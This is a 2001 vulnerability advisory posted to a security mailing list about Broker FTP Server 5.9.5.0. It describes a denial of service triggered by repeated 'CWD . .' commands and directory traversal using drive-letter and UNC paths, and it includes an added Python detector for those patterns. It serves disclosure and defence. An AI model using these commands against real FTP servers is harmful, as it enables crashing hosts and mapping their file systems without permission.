Date: Sun, 10 Jun 2001 01:38:04 -0700 (PDT)
From: ByteRage <[email protected]>
To: [email protected]
Subject: Broker FTP Server 5.9.5.0 Buffer Overflow / DoS / Directory Traversal
Broker FTP Server 5.9.5.0 Buffer Overflow / DoS / Directory Traversal
TESTED ON

Broker FTP Server 5.9.5.0 on Windows 98, likely to work on NT / 2k
DESCRIPTION
1) Buffer Overflow / DoS

The DoS, which completely freezes the victim machine, can be triggered by repeatedly sending the following command (after logging in):

CWD . .

(CD ". ." with an FTP client)

or even better by adding some more spaces between the dots:

CWD .          .

The server seems to regard these dirs as valid and appends them to the current path, causing a DoS after a certain bound has been reached... (I think you have to repeat the last one about 30 times or so...)

I have attached the script brokerdos.pl which automates this.
Maybe I'm getting delusional, but I have once been able to make Broker FTP Server crash this way, setting the EIP to something like " .\" (and my SoftIce popped up), so this buffer overflow might be exploitable... I have not been able to reproduce this situation afterwards though.

Also, the file at C:\Program Files\TransSoft Ltd\Broker 5\Data\Errors.log gave me access violations at offsets that were definitely taken from the input string (like 20202020, 2020202E etc...).
2) Directory Traversal

You can map out the contents of every drive available to the system in the following manner... (You don't seem to be able to upload / download files though.)

To go out of the home directory, type the following in your FTP client:

CD C: or CD C:\

(you can also go to the A: drive with CD A:, or to CD-ROMs & network drives)

Now you can list the contents of the drive with the FTP client:

LS

And dive into subdirs with something like:

CD C:\WINDOWS\

etc...

Although you can map every drive, you don't seem to be able to send/receive files. It is also possible to traverse out of the home directory using UNC pathnames (starting with \\), which might be used to remotely access local shares.
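As an added example (not part of this advisory or of Broker FTP Server), a Python check that a defender could apply to CWD arguments in an FTP server or proxy, or run over logged FTP commands, to flag the two patterns described above: path segments made only of dots and whitespace, and drive-letter or UNC paths that leave the home directory. The sample command lines below are constructed.

```python
import re

# Constructed sample of FTP command lines as a server or proxy might log them;
# they cover the patterns described in the advisory, not real captured traffic.
SAMPLE_COMMANDS = [
    "CWD pub",
    "CWD ..",
    "CWD . .",
    "CWD .                     .",
    "CWD C:\\WINDOWS\\",
    "CWD C:",
    "CWD \\\\fileserver\\share",
    "CWD a:",
    "CWD docs/2001",
]

_DRIVE_RE = re.compile(r"^[A-Za-z]:")      # C:, a:, ...
_DOTS_WS_RE = re.compile(r"^[.\s]+$")      # segment of only dots/whitespace

def cwd_problem(arg):
    """Return a short reason if the CWD argument is unsafe, else None.

    Rejects drive-letter paths, UNC paths, absolute paths, and any path
    segment made only of dots and whitespace that is not exactly '.' or '..'.
    """
    stripped = arg.strip()
    if stripped.startswith("\\\\") or stripped.startswith("//"):
        return "unc-path"
    if _DRIVE_RE.match(stripped):
        return "drive-letter"
    if stripped.startswith("\\") or stripped.startswith("/"):
        return "absolute-path"
    # '. .' or '.      .' are not real directory names; a server that accepts
    # and appends them is treating junk as a valid path component.
    for segment in re.split(r"[\\/]", arg):
        if _DOTS_WS_RE.match(segment) and segment not in (".", ".."):
            return "dot-whitespace-segment"
    return None

def flag_commands(lines):
    """Return (line, reason) for each directory-change command with an unsafe argument."""
    flagged = []
    for line in lines:
        verb, _, arg = line.partition(" ")
        if verb.upper() in ("CWD", "XCWD", "CD") and arg:
            reason = cwd_problem(arg)
            if reason:
                flagged.append((line, reason))
    return flagged

if __name__ == "__main__":
    for line, reason in flag_commands(SAMPLE_COMMANDS):
        print(f"{reason:24} {line!r}")
```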
VENDOR STATUS
I have sent this advisory to <[email protected]>
You can get the updated advisory at
http://elf.box.sk/byterage/adv7.htm
[ByteRage] <[email protected]> [www.byterage.cjb.net]